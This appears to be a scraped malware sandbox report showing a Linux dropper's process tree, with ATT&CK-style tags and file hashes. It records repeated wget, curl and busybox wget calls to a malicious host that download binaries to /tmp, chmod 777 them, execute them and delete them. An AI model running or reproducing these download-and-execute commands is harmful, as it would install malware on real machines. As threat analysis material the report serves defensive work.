/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc./xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i./ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X./YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- System Network Configuration Discovery
PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵PID:981
-
-
/bin/chmodchmod 777 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK./x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵PID:989
-
-
/bin/chmodchmod 777 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m./qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb./200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2./Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX./8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- System Network Configuration Discovery
PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- System Network Configuration Discovery
PID:1017
-
-
/bin/chmodchmod 777 alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA./alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵PID:1021
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵PID:1022
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1023
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- System Network Configuration Discovery
PID:1025
-
-
/bin/chmodchmod 777 iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- File and Directory Permissions Modification
PID:1026
-
-
/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz./iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- Executes dropped EXE
PID:1027
-
-
/bin/rmrm iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵PID:1029
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
16B
MD57689ca8c5bc85cf6b78ef89323d4df6a
SHA1a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA25617dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA51240f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471